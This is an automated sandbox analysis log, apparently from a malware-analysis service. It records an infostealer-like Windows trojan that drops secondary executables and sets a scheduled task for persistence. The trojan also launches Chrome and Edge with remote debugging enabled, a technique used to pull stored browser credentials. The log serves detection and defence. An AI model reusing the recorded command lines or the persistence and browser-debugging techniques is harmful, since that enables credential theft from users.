              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
              Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
              Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
              Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
              Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
              Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
              Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.126.31.71:443 -> 192.168.2.5:49766 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.126.31.71:443 -> 192.168.2.5:49812 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.5:49948 version: TLS 1.2

              System Summary

              barindex
              Source: E89hSGjVrv.exeStatic PE information: section name:
              Source: E89hSGjVrv.exeStatic PE information: section name: .idata
              Source: E89hSGjVrv.exeStatic PE information: section name:
              Source: DocumentsCAFHDBGHJK.exe.0.drStatic PE information: section name:
              Source: DocumentsCAFHDBGHJK.exe.0.drStatic PE information: section name: .idata
              Source: DocumentsCAFHDBGHJK.exe.0.drStatic PE information: section name:
              Source: random[1].exe.0.drStatic PE information: section name:
              Source: random[1].exe.0.drStatic PE information: section name: .idata
              Source: random[1].exe.0.drStatic PE information: section name:
              Source: skotes.exe.20.drStatic PE information: section name:
              Source: skotes.exe.20.drStatic PE information: section name: .idata
              Source: skotes.exe.20.drStatic PE information: section name:
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeFile created: C:\Windows\Tasks\skotes.job
              Source: E89hSGjVrv.exe, 00000000.00000002.2625987452.000000006C592000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs E89hSGjVrv.exe
              Source: E89hSGjVrv.exe, 00000000.00000002.2626534644.000000006C785000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs E89hSGjVrv.exe
              Source: E89hSGjVrv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: E89hSGjVrv.exeStatic PE information: Section: smsoyiwh ZLIB complexity 0.9946275893392269
              Source: DocumentsCAFHDBGHJK.exe.0.drStatic PE information: Section: ZLIB complexity 0.9982437840599455
              Source: DocumentsCAFHDBGHJK.exe.0.drStatic PE information: Section: yasgrbfq ZLIB complexity 0.9945173491701556
              Source: random[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9982437840599455
              Source: random[1].exe.0.drStatic PE information: Section: yasgrbfq ZLIB complexity 0.9945173491701556
              Source: skotes.exe.20.drStatic PE information: Section: ZLIB complexity 0.9982437840599455
              Source: skotes.exe.20.drStatic PE information: Section: yasgrbfq ZLIB complexity 0.9945173491701556
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@72/302@32/27
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\RSM88LAY.htmJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9160:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Temp\ea23b4ef-8eb2-4ddd-89ec-65dc7417bef1.tmpJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
              Source: E89hSGjVrv.exe, 00000000.00000002.2625601969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2614646778.000000001DDA9000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2626413692.000000006C73F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
              Source: E89hSGjVrv.exe, 00000000.00000002.2625601969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2614646778.000000001DDA9000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2626413692.000000006C73F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: E89hSGjVrv.exe, 00000000.00000002.2625601969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2614646778.000000001DDA9000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2626413692.000000006C73F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: E89hSGjVrv.exe, 00000000.00000002.2625601969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2614646778.000000001DDA9000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2626413692.000000006C73F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
              Source: E89hSGjVrv.exe, 00000000.00000002.2625601969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2614646778.000000001DDA9000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2626413692.000000006C73F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: E89hSGjVrv.exe, 00000000.00000002.2625601969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2614646778.000000001DDA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
              Source: E89hSGjVrv.exe, 00000000.00000002.2625601969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2614646778.000000001DDA9000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2626413692.000000006C73F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
              Source: E89hSGjVrv.exe, 00000000.00000003.2264607930.000000001DCA9000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000003.2360893983.000000001DC9D000.00000004.00000020.00020000.00000000.sdmp, AAEBAFBGIDHCBFHIECFC.0.dr, KJKJJJECFIEBFHIEGHJD.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: E89hSGjVrv.exe, 00000000.00000002.2625601969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2614646778.000000001DDA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
              Source: E89hSGjVrv.exe, 00000000.00000002.2625601969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2614646778.000000001DDA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
              Source: E89hSGjVrv.exeReversingLabs: Detection: 83%
              Source: unknownProcess created: C:\Users\user\Desktop\E89hSGjVrv.exe "C:\Users\user\Desktop\E89hSGjVrv.exe"
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2320,i,9541969784439426641,9290128447048775784,262144 /prefetch:8
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2584 --field-trial-handle=2292,i,7521651601030041477,18299988415420470262,262144 /prefetch:3
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2236,i,13588427511518387819,9522602448328524199,262144 /prefetch:3
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6368 --field-trial-handle=2236,i,13588427511518387819,9522602448328524199,262144 /prefetch:8
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6656 --field-trial-handle=2236,i,13588427511518387819,9522602448328524199,262144 /prefetch:8
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsCAFHDBGHJK.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsCAFHDBGHJK.exe "C:\Users\user\DocumentsCAFHDBGHJK.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6540 --field-trial-handle=2236,i,13588427511518387819,9522602448328524199,262144 /prefetch:8
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsCAFHDBGHJK.exe"Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2320,i,9541969784439426641,9290128447048775784,262144 /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2584 --field-trial-handle=2292,i,7521651601030041477,18299988415420470262,262144 /prefetch:3Jump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2236,i,13588427511518387819,9522602448328524199,262144 /prefetch:3
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6368 --field-trial-handle=2236,i,13588427511518387819,9522602448328524199,262144 /prefetch:8
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6368 --field-trial-handle=2236,i,13588427511518387819,9522602448328524199,262144 /prefetch:8
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6656 --field-trial-handle=2236,i,13588427511518387819,9522602448328524199,262144 /prefetch:8
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6540 --field-trial-handle=2236,i,13588427511518387819,9522602448328524199,262144 /prefetch:8
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsCAFHDBGHJK.exe "C:\Users\user\DocumentsCAFHDBGHJK.exe"
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSection loaded: dpapi.dllJump to behavior
